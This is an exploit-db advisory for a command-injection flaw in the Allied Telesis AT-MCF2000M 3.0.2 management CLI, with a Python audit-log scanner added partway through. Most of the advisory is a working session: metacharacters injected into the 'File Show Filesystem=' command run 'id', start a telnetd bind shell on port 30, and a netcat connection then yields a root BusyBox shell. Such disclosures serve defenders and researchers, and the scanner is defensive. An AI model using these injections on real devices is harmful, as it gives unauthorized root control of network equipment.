Allied Telesis AT-MCF2000M 3.0.2 – Remote Command Execution

  • Author: dun
    Date: 2013-01-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/23855/
  • [ Discovered by dun \ posdub[at]gmail.com ]
    [ 2013-01-02 ]
    ####################################################################
    # [ Allied Telesis AT-MCF2000M 3.0.2 ] Gaining Root Shell Access #
    ####################################################################
    #
    # Device: "The AT-MCF2000M is the management module for the AT-MCF2000 two-slot chassis.
    # With the AT-MCF2000M management module, if there is a blade failure,
    # insertion or removal, your traffic flow will not be interrupted.."
    #
    # Vendor: http://www.alliedtelesis.com/
    # Product: http://www.alliedtelesis.com/p-2265.html
    # Software Download: ftp://ftp.alliedtelesis.com/pub/medconv/mcf2000/AT-S85_S97_v302.ZIP
    #
    ###################################################################
    # Vulnerability:
    
    Logging in to the system via SSH or Telnet is required to use this vulnerability.
    After logging in, the user is placed in the client menu (/sbin/AtiCli) and has no direct access to the shell.
    User-supplied data is not validated properly. In the "File Show Filesystem=system://0/m/" command,
    it is possible to inject commands using the special characters "|;&.
    
    Injected commands are limited to at most 25 characters, and the / character is filtered.
    For example:
    
    # File Show Filesystem=system://0/m/";echo 11111111111111111111"
    	File name can be only up to 25 alphanumeric characters.
    <>20:54:16::File Show Filesystem=system://0/m/";echo 11111111111111111111"::DENY(CLI_STRING_LENGTH_OUT_OF_RANGE)::[00.002]
    #
    # File Show Filesystem=system://0/m/";ls -al /"
    <>20:55:00::File Show Filesystem=system://0/m/";ls -al /"::DENY(CLI_INVALID_PARAMETER)::[00.002]
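    As an added defender-side example (not part of the advisory and not vendor code), the following Python parses AtiCli audit-log lines in the format quoted above and flags File Show invocations whose filename part contains the reported metacharacters or exceeds the 25-character limit. The allow-list in validate_filename (including '.' and '_' so that names like BM_0_1.cfg still pass) and the sample log lines are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Audit-log line format shown on the page: <>HH:MM:SS::<command>::STATUS(reason)::[elapsed]
LOG_RE = re.compile(
    r"^<>(?P<time>\d{2}:\d{2}:\d{2})::(?P<cmd>.*?)::"
    r"(?P<status>COMPL|DENY)(?:\((?P<reason>[A-Z_]+)\))?::\[(?P<elapsed>[\d.]+)\]$"
)
# Splits "Filesystem=system://0/m/<name>" into the fixed path and the user-controlled name.
FS_RE = re.compile(r"Filesystem=(?P<path>system://\d+/\w+/)(?P<name>.*)$", re.IGNORECASE)
METACHARS = set('|;&"')  # the characters the advisory reports as reaching the shell

@dataclass
class Finding:
    time: str
    status: str  # COMPL = the device executed the line, DENY = a built-in check rejected it
    name: str
    bad_chars: str

def validate_filename(name: str) -> bool:
    """Hardened allow-list for the File Show name: at most 25 characters, alphanumeric
    plus '.' and '_' (assumed, so that BM_0_1.cfg still passes); empty = list directory."""
    return len(name) <= 25 and re.fullmatch(r"[A-Za-z0-9._]*", name) is not None

def analyse_line(line: str) -> Optional[Finding]:
    """Return a Finding when a logged File Show command carries a name the allow-list rejects."""
    m = LOG_RE.match(line.strip())
    if not m or not m.group("cmd").lower().startswith("file show"):
        return None
    fs = FS_RE.search(m.group("cmd"))
    if not fs or validate_filename(fs.group("name")):
        return None
    name = fs.group("name")
    return Finding(m.group("time"), m.group("status"), name,
                   "".join(sorted(set(name) & METACHARS)))

def scan(lines: List[str]) -> List[Finding]:
    """Findings with status COMPL are the ones that actually reached the shell."""
    return [f for f in map(analyse_line, lines) if f is not None]

# Constructed sample log, modelled on the lines quoted in the advisory.
SAMPLE_LOG = [
    "<>18:55:19::File Show Filesystem=system://0/m/test::COMPL::[00.052]",
    '<>20:54:16::File Show Filesystem=system://0/m/";echo 11111111111111111111"::DENY(CLI_STRING_LENGTH_OUT_OF_RANGE)::[00.002]',
    "<>18:56:02::File Show Filesystem=system://0/m/|id::COMPL::[00.040]",
    "<>19:01:40::exit::COMPL::[00.001]",
]
```

    Running scan(SAMPLE_LOG) yields two findings: the DENY line, which the device's own length check caught, and the COMPL line, which shows an injected name that was executed and is the one worth alerting on.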
    
    
    Getting root access:
    
    root@debian:~# ssh 10.11.200.2
    
    --------------------------------------------------------------------------------
    Allied Telesis Media Converter
    AT-MCF2000
    --------------------------------------------------------------------------------
    Login: manager
    Password: *******
    
    Allied Telesis Media Converter- Version 3.0.2 
     <No System Name>
    # ?
     COnfiguration - Configuration related commands
     DIagnostics   - Diagnostics related commands
     File          - File related commands
     IP            - IP related commands
     Logging       - Logging related commands
     Ntp           - Ntp related commands
     Ping          - Ping a host
     System        - System related commands
     Telnet        - Telnet related commands
     SNMP          - Snmp related commands
     SSh           - SSH related commands
     User          - User management commands
     CLear         - Clear the terminal screen
     Help          - CLI help information
     EXit          - Exit
    # File Show Filesystem=system://0/m/
    Module 0/M File System:
    -rw-r--r--    1 0    0      2640 Jan  1 15:27 BM_0_1.cfg
    -rw-r--r--    1 0    0      2612 Jan  1 15:27 BM_0_2.cfg
    -rw-r--r--    1 0    0      1355 Jan  1 15:27 MM.cfg
    -rw-r--r--    1 0    0       310 Dec 31 13:17 file.inf
    -rw-r--r--    1 0    0      6609 Jan  1 15:27 mcf_chassis0.cfg
    # File Show Filesystem=system://0/m/BM_0_1.cfg
    Module 0/M File System:
    -rw-r--r--    1 0    0      2640 Jan  1 15:27 BM_0_1.cfg
    # File Show Filesystem=system://0/m/test
    Module 0/M File System:
    ls: test: No such file or directory
    
    <>18:55:19::File Show Filesystem=system://0/m/test::COMPL::[00.052]
    # File Show Filesystem=system://0/m/|id
    Module 0/M File System:
    uid=0 gid=0
    # File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"
    Module 0/M File System:
    
    <>19:00:41::File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"::COMPL::[00.061]
    # File Show Filesystem=system://0/m/|"ps aux|grep telnet"
    Module 0/M File System:
      25 0   336 S /usr/sbin/telnetd -l /sbin/AtiCli
     497 0   192 S telnetd -l /bin/sh -p30
    
    <>19:01:02::File Show Filesystem=system://0/m/|"ps aux|grep telnet"::COMPL::[00.117]
    # exit
    <>19:01:40::exit::COMPL::[00.001]
    # 
    logging out.
    Connection to 10.11.200.2 closed.
    
    root@debian:~# nc 10.11.200.2 30
    
    
    BusyBox v1.01 (2005.09.07-23:28+0000) Built-in shell (ash)
    Enter 'help' for a list of built-in commands.
    
    / # id
    uid=0 gid=0
    / # uname -a
    Linux (none) 2.6.14 #2 Thu Jul 23 17:15:38 PDT 2009 ppc unknown
    / # cat /proc/version
    Linux version 2.6.14 (schen@arun-linux) (gcc version 3.4.4) #2 Thu Jul 23 17:15:38 PDT 2009
    / # ls -al
    drwxr-xr-x   15 1046 1002     1024 Jan  1 18:58 .
    drwxr-xr-x   15 1046 1002     1024 Jan  1 18:58 ..
    -rw-r--r--    1 0    0         125 Jan  1 19:10 .ash_history
    -rw-r--r--    1 0    0           0 Jan  1 13:24 1
    drwxr-xr-x    2 0    0        1024 Aug 10  2009 bin
    drwxr-xr-x    3 0    0           0 Jan  1 15:27 cfg
    drwxr-xr-x    4 0    0        2048 Aug 10  2009 dev
    drwxr-xr-x   10 0    0        1024 Jan  1  1970 etc
    drwxr-xr-x    4 0    0        1024 Aug 10  2009 lib
    drwxr-xr-x    2 0    0       12288 Aug 10  2009 lost+found
    drwxr-xr-x    3 0    0        1024 Aug 10  2009 mnt
    dr-xr-xr-x   49 0    0           0 Jan  1  1970 proc
    drwx------    2 0    0        1024 Aug 10  2009 root
    drwxr-xr-x    2 0    0        1024 Aug 10  2009 sbin
    drwxrwxrwt    2 0    0        1024 Jan  1 19:06 tmp
    drwxr-xr-x    6 0    0        1024 Aug 10  2009 usr
    drwxr-xr-x    7 0    0        1024 Jan  1  1970 var
    / # echo pwnd! :) & exit
    pwnd! :)
    Connection closed by foreign host.
    root@debian:~#